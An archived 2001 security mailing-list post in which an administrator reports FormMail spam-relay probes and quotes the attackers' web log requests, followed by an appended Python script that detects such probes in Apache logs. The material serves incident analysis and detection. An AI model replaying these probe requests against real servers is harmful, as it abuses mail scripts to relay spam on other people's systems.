formmail

From: Soeren Ziehe (robintonat_private)
Date: Sat Sep 01 2001 - 14:50:00 PDT


    Hello incidents,
    
    while looking at our weblogs something caught my eye this week.
    
    There was an attempt to use a formmail perl script installed on our
    server from a non-local address.
    
    A quick grep through our weblogs for this month and back to the beginning
    of this year revealed a ton of requests for the 20th this month and a
    few requests on the 11th, 23rd, 27th and 29th.
    
    OK. Here's the beef:
    
    I "censored" the last digits of the culprit's IP address or the first
    part of the culprit's DNS name. Also [server] stands for the hostname of
    my server.
    
    It all began on the 11th.
    
    xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:13 +0200] "GET /cgi-bin/formmail.pl?recipient=johnday32at_private&subject=:-)&email=sexychickgrrrl@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 404 "-" "Microsoft URL Control - 6.00.8169"
    xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:14 +0200] "GET /cgi-bin/FormMail.pl?recipient=johnday32at_private&subject=:-)&email=sexychickgrrrl@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL Control - 6.00.8169"
    
    The first request met a 301 redirect and then accessed the formmail
    script via its correct name (200 code).
    However, mail logs show no outgoing mail resulting from this. This was to
    be expected as the script has been modified to prevent this kind of
    abuse.
    Does anyone know what "Microsoft URL Control" is? I guess a VB6 OCX, am
    I right?
    
    OK. After this initial probe there was a ton of hits on the 20th.
    
    195.223.69.xxx - - [20/Aug/2001:08:08:07 +0200] "GET /cgi-bin/formmail.pl?email=chemieat_private&recipient=extractorguyat_private&subject=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM Agent 1.0"
    
      [505(!) similar loglines omitted]
    .. [20/Aug/2001:08:14:00 +0200] ...
    .. [20/Aug/2001:21:08:26 +0200] ...
      [214(!) similar loglines omitted]
    
    195.223.69.xxx - - [20/Aug/2001:21:16:21 +0200] "GET /cgi-bin/formmail.pl?email=chemieat_private&recipient=extractorguyat_private&subject=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM Agent 1.0"
    
    Different AOL mailbox as recipient and different tool signature.
    Each of the requests was met with a 301 (redirect permanent) status code
    since the script name is not correct (one off, mod_speling).
    
    I have to guess that the program/script was on "auto" mode and maybe did
    not know how to cope with a 301 redirect and kept retrying (until a
    threshold value was hit or until user intervention).
    There were two waves, approx. 08:08 (507 hits) and 21:08 (216 hits) on
    the 20th.
    
    Things started again on the 23rd.
    
    xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:04 +0200] "GET /cgi-bin/formmail.pl?recipient=johnday32at_private&subject=monkr&email=jhat_private&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 393 "-" "Microsoft URL Control - 6.00.8169"
    xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:16 +0200] "GET /cgi-bin/FormMail.pl?recipient=johnday32at_private&subject=monkr&email=jhat_private&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL Control - 6.00.8169"
    
    Again another provider, but the same recipient mailbox and tool signature
    as on the 11th.
    
    On the 23rd we've got the same recipient and provider as on the 20th,
    but a different "tool" signature.
    
    195.223.69.xx - - [23/Aug/2001:05:01:51 +0200] "GET /cgi-bin/formmail.pl?email=extractorguyat_private&recipient=Extractorguyat_private&subject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    195.223.69.xxx - - [23/Aug/2001:05:01:52 +0200] "GET /cgi-bin/FormMail.pl?email=extractorguyat_private&recipient=Extractorguyat_private&subject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl HTTP/1.0" 200 343 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    195.223.69.xxx - - [23/Aug/2001:05:57:45 +0200] "GET /cgi-bin/formmail.pl?email=extractorguyat_private&recipient=Extractorguyat_private&subject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    
    First a 301 redirect, then the correct request. Then again a redirect with no
    follow-up (why?).
    
    The 27th brings us again the "URL Control", but with a slightly different
    version number.
    NO recipient given, but several variants of location and script name
    tried.
    
    xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-bin/formmail.cgi HTTP/1.1" 300 892 "-" "Microsoft URL Control - 6.00.8862"
    xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 361 "-" "Microsoft URL Control - 6.00.8862"
    xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-local/formmail.cgi HTTP/1.1" 404 414 "-" "Microsoft URL Control - 6.00.8862"
    xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/FormMail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 891 "-" "Microsoft URL Control - 6.00.8862"
    xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-local/formmail.pl HTTP/1.1" 404 412 "-" "Microsoft URL Control - 6.00.8862"
    
    On the 29th, a different provider, but the same tool signature as on the 27th.
    Basically the same location/script name variants were tried, however this time
    the same AOL mailbox as for the 20th was given.
    
    xxx.dialsprint.net - - [29/Aug/2001:05:56:49 +0200] "GET /cgi-bin/formmail.pl?recipient=extractorguyat_private&subject=WWW%20Form%20Submission&email=cgierrrat_private&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 419 "-" "Microsoft URL Control - 6.00.8862"
    xxx.dialsprint.net - - [29/Aug/2001:05:56:50 +0200] "GET /cgi-bin/formmail.cgi?recipient=extractorguyat_private&subject=WWW%20Form%20Submission&email=cgierrrat_private&=http://[server]/cgi-bin/formmail.cgi HTTP/1.1" 300 1132 "-" "Microsoft URL Control - 6.00.8862"
    xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/formmail.cgi?recipient=extractorguyat_private&subject=WWW%20Form%20Submission&email=cgierrrat_private&=http://[server]/cgi-local/formmail.cgi HTTP/1.1" 404 472 "-" "Microsoft URL Control - 6.00.8862"
    xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/formmail.pl?recipient=extractorguyat_private&subject=WWW%20Form%20Submission&email=cgierrrat_private&=http://[server]/cgi-local/formmail.pl HTTP/1.1" 404 470 "-" "Microsoft URL Control - 6.00.8862"
    xxx.dialsprint.net - - [29/Aug/2001:05:56:54 +0200] "GET /cgi-bin/FormMail.pl?recipient=extractorguyat_private&subject=WWW%20Form%20Submission&email=cgierrrat_private&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 355 "-" "Microsoft URL Control - 6.00.8862"
    
    
    If you've stayed with me until here: has anyone seen the same access
    attempt patterns/tool signatures?
    
    Robinton
    
    -- 
    I've asked for kindness and ultimate truth. Still waiting for the answer.
    -- 
    Where law turns into injustice, resistance becomes a question of law.
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
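An added example, not part of the post above: a small Python pass over constructed Apache combined-format lines modelled on the ones quoted in the post (placeholder hosts and addresses), which picks out FormMail probes by script name plus `recipient` parameter, groups them by day, source host, User-Agent and status so the 301-vs-200 pattern is visible, and flags hosts that kept retrying into the 301 the way the 20th's two waves did.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(  # Apache combined format: host, day, request line, status, bytes, referer, agent
    r'^(?P<host>\S+) \S+ \S+ \[(?P<day>\d+/\w+/\d+):[\d:]+ [^\]]+\] '
    r'"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
FORMMAIL_NAME = re.compile(r'/formmail\.(pl|cgi)$', re.IGNORECASE)  # any directory, any case
# Constructed sample lines modelled on the post; hosts and addresses are placeholders.
SAMPLE_LOG = """\
xxx.dialup.example.net - - [11/Aug/2001:15:05:13 +0200] "GET /cgi-bin/formmail.pl?recipient=victim%40example.com&subject=:-)&email=x%40example.com HTTP/1.1" 301 404 "-" "Microsoft URL Control - 6.00.8169"
xxx.dialup.example.net - - [11/Aug/2001:15:05:14 +0200] "GET /cgi-bin/FormMail.pl?recipient=victim%40example.com&subject=:-)&email=x%40example.com HTTP/1.1" 200 352 "-" "Microsoft URL Control - 6.00.8169"
192.0.2.10 - - [20/Aug/2001:08:08:07 +0200] "GET /cgi-bin/formmail.pl?email=a%40example.com&recipient=b%40example.com HTTP/1.0" 301 404 "-" "SSM Agent 1.0"
192.0.2.10 - - [20/Aug/2001:08:08:09 +0200] "GET /cgi-bin/formmail.pl?email=a%40example.com&recipient=b%40example.com HTTP/1.0" 301 404 "-" "SSM Agent 1.0"
192.0.2.10 - - [20/Aug/2001:08:08:11 +0200] "GET /cgi-bin/formmail.pl?email=a%40example.com&recipient=b%40example.com HTTP/1.0" 301 404 "-" "SSM Agent 1.0"
192.0.2.10 - - [20/Aug/2001:08:15:00 +0200] "GET /index.html HTTP/1.0" 200 1234 "-" "SSM Agent 1.0"
xxx.hot.example.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/formmail.cgi?recipient=&subject=&email= HTTP/1.1" 404 414 "-" "Microsoft URL Control - 6.00.8862"
"""

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query, keep_blank_values=True)  # keep the empty recipient= probes
    rec["status"] = int(rec["status"])
    return rec

def is_formmail_probe(rec):  # a FormMail script name plus a recipient parameter, blank or not
    return bool(FORMMAIL_NAME.search(rec["path"])) and "recipient" in rec["query"]

def summarize(log_text):
    """Count probes by (day, host, user-agent, status); a 200 means the script itself was reached."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_formmail_probe(rec):
            hits[(rec["day"], rec["host"], rec["agent"], rec["status"])] += 1
    return hits

def redirect_storms(hits, threshold=3):  # hosts that retried into the 301 instead of following it
    per_host = Counter()
    for (day, host, _agent, status), n in hits.items():
        if status == 301:
            per_host[(day, host)] += n
    return {key: n for key, n in per_host.items() if n >= threshold}
```

On real logs, feed `summarize` the file contents and read the 200 entries first: those are the requests that reached the script, and the mail log should be checked against them the way the post does.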
    



    This archive was generated by hypermail 2b30 : Sun Sep 02 2001 - 02:18:08 PDT